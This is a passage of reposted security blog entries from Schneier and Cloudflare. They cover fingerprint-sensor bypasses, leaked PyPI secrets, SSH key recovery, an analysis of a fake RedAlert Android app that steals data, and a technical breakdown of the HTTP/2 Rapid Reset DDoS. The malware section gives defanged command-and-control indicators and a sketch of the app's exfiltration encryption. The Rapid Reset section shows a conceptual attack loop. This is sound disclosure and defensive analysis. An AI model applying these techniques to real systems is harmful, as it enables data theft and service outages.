This is achieved by exploiting four flaws in the session key derivation process, two of which are new, to force the derivation of a short, thus weak and predictable session key (SKC).

Next, the attacker brute-forces the key, enabling them to decrypt past communication and decrypt or manipulate future communications.

The vulnerability has been around for at least a decade.

Breaking Laptop Fingerprint Sensors

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/11/breaking-laptop-fingerprint-sensors.html

They’re not that good:

Security researchers Jesse D’Aguanno and Timo Teräs write that, with varying degrees of reverse-engineering and using some external hardware, they were able to fool the Goodix fingerprint sensor in a Dell Inspiron 15, the Synaptic sensor in a Lenovo ThinkPad T14, and the ELAN sensor in one of Microsoft’s own Surface Pro Type Covers. These are just three laptop models from the wide universe of PCs, but one of these three companies usually does make the fingerprint sensor in every laptop we’ve reviewed in the last few years. It’s likely that most Windows PCs with fingerprint readers will be vulnerable to similar exploits.

Details.

Email Security Flaw Found in the Wild

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/11/email-security-flaw-found-in-the-wild.html

Google’s Threat Analysis Group announced a zero-day against the Zimbra Collaboration email server that has been used against governments around the world.

TAG has observed four different groups exploiting the same bug to steal email data, user credentials, and authentication tokens. Most of this activity occurred after the initial fix became public on Github. To ensure protection against these types of exploits, TAG urges users and organizations to keep software fully up-to-date and apply security updates as soon as they become available.

The vulnerability was discovered in June. It has been patched.

Friday Squid Blogging: Unpatched Vulnerabilities in the Squid Caching Proxy

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/11/friday-squid-blogging-unpatched-vulnerabilities-in-the-squid-caching-proxy.html

In a rare squid/security post, here’s an article about unpatched vulnerabilities in the Squid caching proxy.

As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.

Read my blog posting guidelines here.

Leaving Authentication Credentials in Public Code

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/11/leaving-authentication-credentials-in-public-code.html

Interesting article about a surprisingly common vulnerability: programmers leaving authentication credentials and other secrets in publicly accessible software code:

Researchers from security firm GitGuardian this week reported finding almost 4,000 unique secrets stashed inside a total of 450,000 projects submitted to PyPI, the official code repository for the Python programming language. Nearly 3,000 projects contained at least one unique secret. Many secrets were leaked more than once, bringing the total number of exposed secrets to almost 57,000.

[…]

The credentials exposed provided access to a range of resources, including Microsoft Active Directory servers that provision and manage accounts in enterprise networks, OAuth servers allowing single sign-on, SSH servers, and third-party services for customer communications and cryptocurrencies. Examples included:

  • Azure Active Directory API Keys
  • GitHub OAuth App Keys
  • Database credentials for providers such as MongoDB, MySQL, and PostgreSQL
  • Dropbox Key
  • Auth0 Keys
  • SSH Credentials
  • Coinbase Credentials
  • Twilio Master Credentials.

New SSH Vulnerability

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/11/new-ssh-vulnerability.html

This is interesting:

For the first time, researchers have demonstrated that a large portion of cryptographic keys used to protect data in computer-to-server SSH traffic are vulnerable to complete compromise when naturally occurring computational errors occur while the connection is being established.

[…]

The vulnerability occurs when there are errors during the signature generation that takes place when a client and server are establishing a connection. It affects only keys using the RSA cryptographic algorithm, which the researchers found in roughly a third of the SSH signatures they examined. That translates to roughly 1 billion signatures out of the 3.2 billion signatures examined. Of the roughly 1 billion RSA signatures, about one in a million exposed the private key of the host.

Research paper:

Passive SSH Key Compromise via Lattices

Abstract: We demonstrate that a passive network attacker can opportunistically obtain private RSA host keys from an SSH server that experiences a naturally arising fault during signature computation. In prior work, this was not believed to be possible for the SSH protocol because the signature included information like the shared Diffie-Hellman secret that would not be available to a passive network observer. We show that for the signature parameters commonly in use for SSH, there is an efficient lattice attack to recover the private key in case of a signature fault. We provide a security analysis of the SSH, IKEv1, and IKEv2 protocols in this scenario, and use our attack to discover hundreds of compromised keys in the wild from several independently vulnerable implementations.

Malicious “RedAlert – Rocket Alerts” Application Targets Israeli Phone Calls, SMS, and User Information

Post Syndicated from Blake Darché original http://blog.cloudflare.com/malicious-redalert-rocket-alerts-application-targets-israeli-phone-calls-sms-and-user-information/

On October 13, 2023, Cloudflare’s Cloudforce One Threat Operations Team became aware of a website hosting a Google Android application (APK) impersonating the legitimate RedAlert – Rocket Alerts application (https://play.google.com/store/apps/details?id=com.red.alert&hl=en&pli=1). More than 5,000 rockets have been launched into Israel since the attacks from Hamas began on October 7, 2023. RedAlert – Rocket Alerts, developed by Elad Nava, allows individuals to receive timely and precise alerts about incoming airstrikes. Many people living in Israel rely on these alerts to seek safety – a service which has become increasingly important given the newest escalations in the region.

Applications alerting of incoming airstrikes have become targets: only days ago, the pro-Palestinian hacktivist group AnonGhost exploited a vulnerability in another application, “Red Alert: Israel” by Kobi Snir (https://cybernews.com/cyber-war/israel-redalert-breached-anonghost-hamas/). Their exploit allowed them to intercept requests, expose servers and APIs, and send fake alerts to some app users, including a message that a “nuclear bomb is coming”. AnonGhost also claimed they attacked other rocket alert applications, including RedAlert by Elad Nava. As of October 11, 2023, the RedAlert app was reportedly functioning normally.

In the last two days, a new malicious website (hxxps://redalerts[.]me) has advertised the download of the well-known open source application RedAlert by Elad Nava (https://github.com/eladnava/redalert-android). Domain impersonation continues to be a popular vector for attackers, as the legitimate website for the application (hxxps://redalert[.]me) differs from the malicious website by only one letter. Further, threat actors continue to exploit open source code and deploy modified, malicious versions to unsuspecting users.

The malicious website hosted links to both the iOS and Android versions of the RedAlert app. While the link to the Apple App Store referred to the legitimate version of the RedAlert app by Elad Nava, the link supposedly pointing to the Android version on the Play Store directly downloaded a malicious APK file. This attack demonstrates the danger of sideloading applications directly from the Internet as opposed to installing them from an approved app store.

The malicious RedAlert version imitates the legitimate rocket alert application but simultaneously collects sensitive user data. Additional permissions requested by the malicious app include access to contacts, call logs, SMS, account information, as well as an overview of all installed apps.

The website hosting the malicious file was created on October 12, 2023, and has since been taken offline. Only users who installed the Android version of the app from this specific website are impacted and are urgently advised to delete the app. Users can determine whether they installed the malicious version by reviewing the permissions granted to the RedAlert app. If users are unsure whether they installed the malicious version, they can delete the RedAlert application and reinstall the legitimate version directly from the Play Store.

Screenshot of the attacker site https://redalerts[.]me

Malicious Android Package Kit (APK) Analysis

The malicious Android Package Kit (APK) file is installed by a user when they click the Google Play button on the fake RedAlert site. Once clicked, the user downloads the app directly from the fake site at hxxps://redalerts[.]me/app.apk. The SHA-256 hash of the APK is 5087a896360f5d99fbf4eb859c824d19eb6fa358387bf6c2c5e836f7927921c5.

Capabilities

A quick analysis of the AndroidManifest.xml file shows several differences compared to the legitimate, open source RedAlert application. Most notable are the additional permissions needed to collect information on the victim. The permissions added are listed below:

  • android.permission.GET_ACCOUNTS
  • android.permission.QUERY_ALL_PACKAGES
  • android.permission.READ_CALL_LOG
  • android.permission.READ_CONTACTS
  • android.permission.READ_PHONE_NUMBERS
  • android.permission.READ_PHONE_STATE
  • android.permission.READ_PRIVILEGED_PHONE_STATE
  • android.permission.READ_SMS

The application is designed to look and act like RedAlert. However, upon opening the app, a malicious service is started in the background. The startService() call is the only change to the onCreate() method, and it begins the sequence of malicious activity, which the actor has placed in a package called com.company.allinclusive.AI.

The attacker starts their malicious code within the legitimate RedAlert code, com.red.alert.activities: Main.java

The service is run to gather data from victims’ phones and upload it to the actor’s secure server. The data is extensive and includes:

  • SIM information, including IMEI and IMSI numbers, network type, country, voicemail number, PIN status, and more
  • Full Contact list
  • All SMS messages, including content and metadata for all statuses (e.g. received, outgoing, sent, etc.)
  • A list of accounts associated with the device
  • All phone calls and conversation details, including incoming, outgoing, missed, rejected, and blocked calls
  • Logged-in email and app accounts
  • List of installed applications

The actor’s code for gathering this information is illustrated below.

com.company.allinclusive.AI: AIMain.java contains the data the attacker will capture from the target

Stolen data is uploaded to an HTTP server at a hardcoded IP address. The actor has a Tools class which details the IP address where the data is to be uploaded:

com.company.allinclusive.AI: Tools.java stores the attacker’s command-and-control address for the malware

Although HTTP and port 80 are specified, the actor appears to have the ability to use HTTPS and port 443 if a certificate is found bundled within the application package:

com.company.allinclusive.AI: UploadFileAsync.java

Data is uploaded through a Connector class written by the actor. The Connector is responsible for encrypting the stolen data and uploading it to the HTTP server. In this sample, files are encrypted with AES in CBC mode with PKCS5 padding. The keys are randomly generated and appended to the packaged data; however, the keys themselves are encrypted with RSA using a public key bundled in the malicious app. Because of this, anybody who is able to intercept the stolen data will be unable to decrypt it without the actor’s private key.

The encrypted files have names that look like <ID>_<DATE>.final, which contain:

  • <ID>_<DATE>.enc (encrypted data)
  • <ID>_<DATE>.param (AES encryption parameters, e.g. key and IV)
  • <ID>_<DATE>.eparam (RSA parameters, e.g. public key)
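For illustration, here is a minimal Python sketch of this kind of hybrid scheme, using the third-party cryptography package; the function and variable names are ours, not the malware's:

import os

from cryptography.hazmat.primitives import padding
from cryptography.hazmat.primitives.asymmetric import padding as rsa_padding
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

def encrypt_exfil(data: bytes, public_key) -> tuple[bytes, bytes]:
    # Random AES key and IV, analogous to the sample's .param contents.
    key, iv = os.urandom(32), os.urandom(16)
    padder = padding.PKCS7(128).padder()  # PKCS5/PKCS7 block padding
    padded = padder.update(data) + padder.finalize()
    encryptor = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
    ciphertext = encryptor.update(padded) + encryptor.finalize()
    # Wrap the AES parameters with RSA PKCS#1 v1.5, as the .eparam step does.
    wrapped_params = public_key.encrypt(key + iv, rsa_padding.PKCS1v15())
    return ciphertext, wrapped_params

# Demo with a throwaway key pair; the real malware ships only a public key,
# so an interceptor cannot unwrap the AES parameters without the private key.
private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
ct, wrapped = encrypt_exfil(b"stolen SMS and contacts", private_key.public_key())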

Anti-Analysis Runtime Capabilities

To avoid detection, the actor included anti-analysis capabilities that run when the app is started. The anti-analysis methods the attacker included are anti-debugging, anti-emulation, and anti-test operations.

Anti-Debugging

The application makes a simple call using the built-in android.os.Debug package to see if the application is being debugged.

com.company.allinclusive.AI.anti.debugger: FindDebugger.java

Anti-Emulation

The application attempts to locate certain files and identifiers to determine whether it is being run in an emulated environment. A snippet of these indicators are shown below:

com.company.allinclusive.AI.anti.emulator: FindEmulator.java checks for common emulators

Anti-Test

The application has utilities to identify whether a test user (“monkey”) is using the application:

com.company.allinclusive.AI.anti.monkey: FindMonkey.java

These methodologies are all rudimentary checks for whether the application is under runtime analysis. They do not, however, protect the malicious code against static analysis.

How To Detect This Malware On Your Device

If you have installed RedAlert on your device, the extraneous permissions added by the actor can be used to determine whether you have been compromised. The following permissions appearing on the RedAlert app (whether or not enabled) would indicate compromise:

  • Call Logs
  • Contacts
  • Phone
  • SMS

How To Protect Yourself

You can avoid attacks like this by following the guidance below:

  • Keep your mobile device up to date on the latest software version at all times
  • Consider using Cloudflare Teams (with Cloudflare Gateway)
  • Avoid using third party mobile application stores
  • Never install applications from Internet URLs or sideload payloads
  • Consider using 1.1.1.1 for families to block malicious domains on your network

IOCs

  • Malicious RedAlert APK download URL: hxxp://redalerts[.]me/app.apk
  • Malicious RedAlert APK command and control: hxxp://23.254.228[.]135:80/file.php
  • Malicious RedAlert APK (SHA-256): 5087a896360f5d99fbf4eb859c824d19eb6fa358387bf6c2c5e836f7927921c5
  • Public key (RSA/ECB/PKCS1Padding): MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvBYe8dLw1TVH39EVQEwCr7kgBRtQz2M2vQbgkbr0UiTFm0Tk9KVZ1jn0uVgJ+dh1I7uuIfzFEopFQ35OxRnjmNAJsOYpYA5ZvD2llS+KUyE4TRJZGh+dfGjc98dCGCVW9aPVuyfciFNpzGU+lUV/nIbi8xmHOSzho+GZvrRWNDvJqmX7Xunjr1crAKIpG1kF8bpa9+VkoKnMOqFBTc6aPEmwj4CmeTsTy+j7ubdKc8tsdoCTGfrLzVj4wlGDjtf06dYEtZ6zvdBbzb4UA6Ilxsb12KY03qdlqlFREqCxjtJUYDEYChnpOSkrzpLOu+TTkAlW68+u6JjgE8AAAnjpIGRRNvuj5ZfTS3Ub3xEABBRUuHcesseuaN3wVwvMBIMbWJabVUWUNWYyCewxrtdrc8HStECbS/b05j2lv6Cl1Qv1iQefurL/hvfREmxlHAnkCmzTxlrEStHHnNmhWOccQI+u0VO6klJShNg8XlRsKXnqpPi3aicki+QMo3i1oWOve6aWkAIJvmHaY4Gmz0nX2foxlJ2YxOGQe0rUAqDXa8S6tYSmIyCYJoTmllvwJAEpCtOFxerZIAa/1BaxYFhH/iQUzzayJuc6ooUmKLw7q72pe3tN0cRT3RAJUmRwTcV5hL+UQgakkSzIMFBpM/rpvNC0Qy94mtpNf6iA6gbKm40CAwEAAQ==



Cisco Can’t Stop Using Hard-Coded Passwords

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2023/10/cisco-cant-stop-using-hard-coded-passwords.html

There’s a new Cisco vulnerability in its Emergency Responder product:

This vulnerability is due to the presence of static user credentials for the root account that are typically reserved for use during development. An attacker could exploit this vulnerability by using the account to log in to an affected system. A successful exploit could allow the attacker to log in to the affected system and execute arbitrary commands as the root user.

This is not the first time Cisco products have had hard-coded passwords made public. You’d think it would learn.

HTTP/2 Rapid Reset: deconstructing the record-breaking attack

Post Syndicated from Lucas Pardue original http://blog.cloudflare.com/technical-breakdown-http2-rapid-reset-ddos-attack/


Starting on Aug 25, 2023, we began to notice some unusually large HTTP attacks hitting many of our customers. These attacks were detected and mitigated by our automated DDoS system. It was not long, however, before they started to reach record-breaking sizes, eventually peaking just above 201 million requests per second. This was nearly 3x bigger than our previous biggest attack on record.

Concerning is the fact that the attacker was able to generate such an attack with a botnet of merely 20,000 machines. There are botnets today that are made up of hundreds of thousands or millions of machines. Given that the entire web typically sees only between 1–3 billion requests per second, it's not inconceivable that this method could be used to focus an entire web's worth of requests on a small number of targets.

Detecting and Mitigating

This was a novel attack vector at an unprecedented scale, but Cloudflare's existing protections were largely able to absorb the brunt of the attacks. While initially we saw some impact to customer traffic — affecting roughly 1% of requests during the initial wave of attacks — today we’ve been able to refine our mitigation methods to stop the attack for any Cloudflare customer without it impacting our systems.

We noticed these attacks at the same time two other major industry players — Google and AWS — were seeing the same. We worked to harden Cloudflare’s systems to ensure that, today, all our customers are protected from this new DDoS attack method without any customer impact. We’ve also participated with Google and AWS in a coordinated disclosure of the attack to impacted vendors and critical infrastructure providers.

This attack was made possible by abusing some features of the HTTP/2 protocol and server implementation details (see CVE-2023-44487 for details). Because the attack abuses an underlying weakness in the HTTP/2 protocol, we believe any vendor that has implemented HTTP/2 will be subject to the attack. This includes every modern web server. We, along with Google and AWS, have disclosed the attack method to web server vendors who we expect will implement patches. In the meantime, the best defense is using a DDoS mitigation service like Cloudflare’s in front of any web-facing web or API server.

This post dives into the details of the HTTP/2 protocol, the feature that attackers exploited to generate these massive attacks, and the mitigation strategies we took to ensure all our customers are protected. Our hope is that by publishing these details other impacted web servers and services will have the information they need to implement mitigation strategies. And, moreover, the HTTP/2 protocol standards team, as well as teams working on future web standards, can better design them to prevent such attacks.

RST attack details

HTTP is the application protocol that powers the Web. HTTP Semantics are common to all versions of HTTP — the overall architecture, terminology, and protocol aspects such as request and response messages, methods, status codes, header and trailer fields, message content, and much more. Each individual HTTP version defines how semantics are transformed into a "wire format" for exchange over the Internet. For example, a client has to serialize a request message into binary data and send it, then the server parses that back into a message it can process.

HTTP/1.1 uses a textual form of serialization. Request and response messages are exchanged as a stream of ASCII characters, sent over a reliable transport layer like TCP, using the following format (where CRLF means carriage-return and linefeed):

 HTTP-message   = start-line CRLF
                   *( field-line CRLF )
                   CRLF
                   [ message-body ]

For example, a very simple GET request for https://blog.cloudflare.com/ would look like this on the wire:

GET / HTTP/1.1 CRLF
Host: blog.cloudflare.com CRLF
CRLF

And the response would look like:

HTTP/1.1 200 OK CRLF
Server: cloudflare CRLF
Content-Length: 100 CRLF
Content-Type: text/html; charset=UTF-8 CRLF
CRLF
<100 bytes of data>

This format frames messages on the wire, meaning that it is possible to use a single TCP connection to exchange multiple requests and responses. However, the format requires that each message is sent whole. Furthermore, in order to correctly correlate requests with responses, strict ordering is required; meaning that messages are exchanged serially and can not be multiplexed. Two GET requests, for https://blog.cloudflare.com/ and https://blog.cloudflare.com/page/2/, would be:

GET / HTTP/1.1 CRLF
Host: blog.cloudflare.com CRLF
CRLF
GET /page/2/ HTTP/1.1 CRLF
Host: blog.cloudflare.com CRLF
CRLF

With the responses:

HTTP/1.1 200 OK CRLF
Server: cloudflare CRLF
Content-Length: 100 CRLF
Content-Type: text/html; charset=UTF-8 CRLF
CRLF
<100 bytes of data>
HTTP/1.1 200 OK CRLF
Server: cloudflare CRLF
Content-Length: 100 CRLF
Content-Type: text/html; charset=UTF-8 CRLF
CRLF
<100 bytes of data>

Web pages require more complicated HTTP interactions than these examples. When visiting the Cloudflare blog, your browser will load multiple scripts, styles and media assets. If you visit the front page using HTTP/1.1 and decide quickly to navigate to page 2, your browser can pick from two options. Either wait for all of the queued up responses for the page that you no longer want before page 2 can even start, or cancel in-flight requests by closing the TCP connection and opening a new connection. Neither of these is very practical. Browsers tend to work around these limitations by managing a pool of TCP connections (up to 6 per host) and implementing complex request dispatch logic over the pool.

HTTP/2 addresses many of the issues with HTTP/1.1. Each HTTP message is serialized into a set of HTTP/2 frames that have type, length, flags, stream identifier (ID) and payload. The stream ID makes it clear which bytes on the wire apply to which message, allowing safe multiplexing and concurrency. Streams are bidirectional. Clients send frames and servers reply with frames using the same ID.

In HTTP/2 our GET request for https://blog.cloudflare.com would be exchanged across stream ID 1, with the client sending one HEADERS frame, and the server responding with one HEADERS frame, followed by one or more DATA frames. Client requests always use odd-numbered stream IDs, so subsequent requests would use stream ID 3, 5, and so on. Responses can be served in any order, and frames from different streams can be interleaved.
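Every HTTP/2 frame begins with the same 9-byte header, which makes the framing easy to illustrate. A minimal Java sketch of parsing it (field layout per RFC 9113; the record and method names are ours):

import java.nio.ByteBuffer;

// 24-bit payload length, 8-bit type, 8-bit flags, 1 reserved bit + 31-bit stream ID.
record FrameHeader(int length, int type, int flags, int streamId) {
    static FrameHeader parse(ByteBuffer buf) {
        int length = ((buf.get() & 0xFF) << 16)
                   | ((buf.get() & 0xFF) << 8)
                   |  (buf.get() & 0xFF);
        int type   = buf.get() & 0xFF;            // 0x0 DATA, 0x1 HEADERS, 0x3 RST_STREAM, ...
        int flags  = buf.get() & 0xFF;            // e.g. 0x1 = END_STREAM on HEADERS/DATA
        int streamId = buf.getInt() & 0x7FFFFFFF; // mask off the reserved bit
        return new FrameHeader(length, type, flags, streamId);
    }
}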


Stream multiplexing and concurrency are powerful features of HTTP/2. They enable more efficient usage of a single TCP connection. HTTP/2 optimizes resource fetching, especially when coupled with prioritization. On the flip side, making it easy for clients to launch large amounts of parallel work can increase the peak demand for server resources when compared to HTTP/1.1. This is an obvious vector for denial-of-service.

In order to provide some guardrails, HTTP/2 provides a notion of maximum active concurrent streams. The SETTINGS_MAX_CONCURRENT_STREAMS parameter allows a server to advertise its limit of concurrency. For example, if the server states a limit of 100, then only 100 requests can be active at any time. If a client attempts to open a stream above this limit, it must be rejected by the server using a RST_STREAM frame. Stream rejection does not affect the other in-flight streams on the connection.
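In server pseudocode, this guardrail amounts to a counter checked on every new HEADERS frame. A sketch of the idea (the bookkeeping and helper names are ours, not any particular server's implementation):

import java.util.HashSet;
import java.util.Set;

class StreamLimiter {
    static final int MAX_CONCURRENT_STREAMS = 100; // advertised in SETTINGS
    static final int REFUSED_STREAM = 0x7;         // RST_STREAM error code

    final Set<Integer> activeStreams = new HashSet<>();

    void onHeaders(int streamId) {
        if (activeStreams.size() >= MAX_CONCURRENT_STREAMS) {
            sendRstStream(streamId, REFUSED_STREAM); // reject this stream only
            return;
        }
        activeStreams.add(streamId); // removed again when the stream closes (omitted)
        dispatch(streamId);          // hand the request to upstream processing
    }

    void sendRstStream(int streamId, int errorCode) { /* write the frame */ }
    void dispatch(int streamId) { /* application-specific */ }
}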

The true story is a little more complicated. Streams have a lifecycle. Below is a diagram of the HTTP/2 stream state machine. Client and server manage their own views of the state of a stream. HEADERS, DATA and RST_STREAM frames trigger transitions when they are sent or received. Although the views of the stream state are independent, they are synchronized.

HEADERS and DATA frames include an END_STREAM flag that, when set to 1 (true), can trigger a state transition.

[Figure: HTTP/2 stream state machine]

Let's work through this with an example of a GET request that has no message content. The client sends the request as a HEADERS frame with the END_STREAM flag set to 1. The client first transitions the stream from idle to open state, then immediately transitions into half-closed state. The client half-closed state means that it can no longer send HEADERS or DATA, only WINDOW_UPDATE, PRIORITY or RST_STREAM frames. It can receive any frame however.

Once the server receives and parses the HEADERS frame, it transitions the stream state from idle to open and then half-closed, so it matches the client. The server half-closed state means it can send any frame but receive only WINDOW_UPDATE, PRIORITY or RST_STREAM frames.

The response to the GET contains message content, so the server sends HEADERS with END_STREAM flag set to 0, then DATA with END_STREAM flag set to 1. The DATA frame triggers the transition of the stream from half-closed to closed on the server. When the client receives it, it also transitions to closed. Once a stream is closed, no frames can be sent or received.

Applying this lifecycle back into the context of concurrency, HTTP/2 states:

Streams that are in the "open" state or in either of the "half-closed" states count toward the maximum number of streams that an endpoint is permitted to open. Streams in any of these three states count toward the limit advertised in the SETTINGS_MAX_CONCURRENT_STREAMS setting.

In theory, the concurrency limit is useful. However, there are practical factors that hamper its effectiveness, which we will cover later in the blog.

HTTP/2 request cancellation

Earlier, we talked about client cancellation of in-flight requests. HTTP/2 supports this in a much more efficient way than HTTP/1.1. Rather than needing to tear down the whole connection, a client can send a RST_STREAM frame for a single stream. This instructs the server to stop processing the request and to abort the response, which frees up server resources and avoids wasting bandwidth.

Let's consider our previous example of 3 requests. This time the client cancels the request on stream 1 after all of the HEADERS have been sent. The server parses this RST_STREAM frame before it is ready to serve the response and instead only responds to stream 3 and 5:

[Figure: cancellation of stream 1; responses sent only on streams 3 and 5]

Request cancellation is a useful feature. For example, when scrolling a webpage with multiple images, a web browser can cancel images that fall outside the viewport, meaning that images entering it can load faster. HTTP/2 makes this behaviour a lot more efficient compared to HTTP/1.1.

A canceled request stream transitions rapidly through the stream lifecycle. The client's HEADERS with the END_STREAM flag set to 1 transitions the state from idle to open to half-closed; RST_STREAM then immediately causes a transition from half-closed to closed.

[Figure: stream lifecycle of a rapidly reset request]

Recall that only streams that are in the open or half-closed state contribute to the stream concurrency limit. When a client cancels a stream, it instantly gets the ability to open another stream in its place and can send another request immediately. This is the crux of what makes CVE-2023-44487 work.

Rapid resets leading to denial of service

HTTP/2 request cancellation can be abused to rapidly reset an unbounded number of streams. When an HTTP/2 server is able to process client-sent RST_STREAM frames and tear down state quickly enough, such rapid resets do not cause a problem. Where issues start to crop up is when there is any kind of delay or lag in tidying up. The client can churn through so many requests that a backlog of work accumulates, resulting in excess consumption of resources on the server.
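In terms of frames on the wire, the abuse pattern is just a tight loop. A conceptual sketch of the attacker's side (illustrative only; the frame-writing helpers are hypothetical):

class RapidReset {
    static final int CANCEL = 0x8; // RST_STREAM error code used for cancellation

    void churn(int totalRequests) {
        int streamId = 1; // client-initiated streams use odd IDs
        for (int i = 0; i < totalRequests; i++) {
            sendHeaders(streamId, /* endStream= */ true); // open a request...
            sendRstStream(streamId, CANCEL);              // ...and cancel it at once,
            streamId += 2;                                // freeing a concurrency slot
        }
    }

    void sendHeaders(int streamId, boolean endStream) { /* write HEADERS frame */ }
    void sendRstStream(int streamId, int errorCode) { /* write RST_STREAM frame */ }
}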

A common HTTP deployment architecture is to run an HTTP/2 proxy or load-balancer in front of other components. When a client request arrives it is quickly dispatched and the actual work is done as an asynchronous activity somewhere else. This allows the proxy to handle client traffic very efficiently. However, this separation of concerns can make it hard for the proxy to tidy up the in-process jobs. Therefore, these deployments are more likely to encounter issues from rapid resets.

When Cloudflare's reverse proxies process incoming HTTP/2 client traffic, they copy the data from the connection’s socket into a buffer and process that buffered data in order. As each request is read (HEADERS and DATA frames) it is dispatched to an upstream service. When RST_STREAM frames are read, the local state for the request is torn down and the upstream is notified that the request has been canceled. Rinse and repeat until the entire buffer is consumed. However this logic can be abused: when a malicious client started sending an enormous chain of requests and resets at the start of a connection, our servers would eagerly read them all and create stress on the upstream servers to the point of being unable to process any new incoming request.

Something that is important to highlight is that stream concurrency on its own cannot mitigate rapid reset. The client can churn requests to create high request rates no matter the server's chosen value of SETTINGS_MAX_CONCURRENT_STREAMS.

Rapid Reset dissected

Here's an example of rapid reset reproduced using a proof-of-concept client attempting to make a total of 1000 requests. I've used an off-the-shelf server without any mitigations, listening on port 443 in a test environment. The traffic is dissected using Wireshark and filtered to show only HTTP/2 traffic for clarity. Download the pcap to follow along.

[Figure: Wireshark view of the captured HTTP/2 traffic]

It's a bit difficult to see, because there are a lot of frames. We can get a quick summary via Wireshark's Statistics > HTTP2 tool:

[Figure: Wireshark Statistics > HTTP2 summary]

The first frame in this trace, in packet 14, is the server's SETTINGS frame, which advertises a maximum stream concurrency of 100. In packet 15, the client sends a few control frames and then starts making requests that are rapidly reset. The first HEADERS frame is 26 bytes long, all subsequent HEADERS are only 9 bytes. This size difference is due to a compression technology called HPACK. In total, packet 15 contains 525 requests, going up to stream 1051.


Interestingly, the RST_STREAM for stream 1051 doesn't fit in packet 15, so in packet 16 we see the server respond with a 404 response. Then in packet 17 the client does send the RST_STREAM, before moving on to sending the remaining 475 requests.

Note that although the server advertised 100 concurrent streams, both packets sent by the client contained far more HEADERS frames than that. The client did not have to wait for any return traffic from the server; it was only limited by the size of the packets it could send. No server RST_STREAM frames are seen in this trace, indicating that the server did not observe a concurrent stream violation.

Impact on customers

As mentioned above, as requests are canceled, upstream services are notified and can abort requests before wasting too many resources on them. This was the case with this attack, where most malicious requests were never forwarded to the origin servers. However, the sheer size of these attacks did cause some impact.

First, as the rate of incoming requests reached peaks never seen before, we had reports of increased levels of 502 errors seen by clients. This happened on our most impacted data centers as they were struggling to process all the requests. While our network is meant to deal with large attacks, this particular vulnerability exposed a weakness in our infrastructure. Let's dig a little deeper into the details, focusing on how incoming requests are handled when they hit one of our data centers:

[Figure: how incoming requests flow through a Cloudflare data center]

We can see that our infrastructure is composed of a chain of different proxy servers with different responsibilities. In particular, when a client connects to Cloudflare to send HTTPS traffic, it first hits our TLS decryption proxy: it decrypts TLS traffic, processes HTTP 1, 2 or 3 traffic, then forwards it to our "business logic" proxy. This one is responsible for loading all the settings for each customer, then routing the requests correctly to other upstream services — and more importantly in our case, it is also responsible for security features. This is where L7 attack mitigation is processed.

The problem with this attack vector is that it manages to send a lot of requests very quickly in every single connection. Each of them had to be forwarded to the business logic proxy before we had a chance to block it. As the request throughput became higher than our proxy capacity, the pipe connecting these two services reached its saturation level in some of our servers.

When this happens, the TLS proxy cannot connect anymore to its upstream proxy; this is why some clients saw a bare "502 Bad Gateway" error during the most serious attacks. It is important to note that, as of today, the logs used to create HTTP analytics are also emitted by our business logic proxy. The consequence is that these errors are not visible in the Cloudflare dashboard. Our internal dashboards show that about 1% of requests were impacted during the initial wave of attacks (before we implemented mitigations), with peaks at around 12% for a few seconds during the most serious one on August 29th. The following graph shows the ratio of these errors over a two-hour window while this was happening:

[Figure: ratio of 502 errors during the initial attacks]

We worked to reduce this number dramatically in the following days, as detailed later in this post. Thanks both to changes in our stack and to mitigations that considerably reduce the size of these attacks, this number is today effectively zero:

[Figure: ratio of 502 errors after mitigations were deployed]

499 errors and the challenges for HTTP/2 stream concurrency

Another symptom reported by some customers is an increase in 499 errors. The reason for this is a bit different and is related to the maximum stream concurrency in an HTTP/2 connection detailed earlier in this post.

HTTP/2 settings are exchanged at the start of a connection using SETTINGS frames. In the absence of receiving an explicit parameter, default values apply. Once a client establishes an HTTP/2 connection, it can wait for the server's SETTINGS (slow) or it can assume the default values and start making requests (fast). For SETTINGS_MAX_CONCURRENT_STREAMS, the default is effectively unlimited (stream IDs use a 31-bit number space, and requests use odd numbers, so the actual limit is 1073741824). The specification recommends that a server offer no fewer than 100 streams. Clients are generally biased towards speed, so they don't tend to wait for server settings, which creates a bit of a race condition. Clients are gambling on what limit the server might pick; if they guess wrong, the request will be rejected and will have to be retried. Gambling on 1073741824 streams is a bit silly. Instead, a lot of clients decide to limit themselves to issuing 100 concurrent streams, in the hope that servers follow the specification recommendation. Where servers pick something below 100, this client gamble fails and streams are reset.


There are many reasons a server might reset a stream beyond concurrency limit overstepping. HTTP/2 is strict and requires a stream to be closed when there are parsing or logic errors. In 2019, Cloudflare developed several mitigations in response to HTTP/2 DoS vulnerabilities. Several of those vulnerabilities were caused by a client misbehaving, leading the server to reset a stream. A very effective strategy to clamp down on such clients is to count the number of server resets during a connection, and when that exceeds some threshold value, close the connection with a GOAWAY frame. Legitimate clients might make one or two mistakes in a connection and that is acceptable. A client that makes too many mistakes is probably either broken or malicious and closing the connection addresses both cases.
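The mitigation is essentially a per-connection counter. A sketch of the idea (the threshold and helper names are illustrative, not Cloudflare's actual values or code):

class ResetGuard {
    static final int RESET_THRESHOLD = 50;    // illustrative value
    static final int ENHANCE_YOUR_CALM = 0xB; // GOAWAY error code from the RFC

    int serverResets = 0;

    void onServerReset(int lastStreamId) {
        if (++serverResets > RESET_THRESHOLD) {
            sendGoAway(lastStreamId, ENHANCE_YOUR_CALM); // stop accepting new streams
            closeConnection();                           // and tear the connection down
        }
    }

    void sendGoAway(int lastStreamId, int errorCode) { /* write GOAWAY frame */ }
    void closeConnection() { /* close the TCP/TLS connection */ }
}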

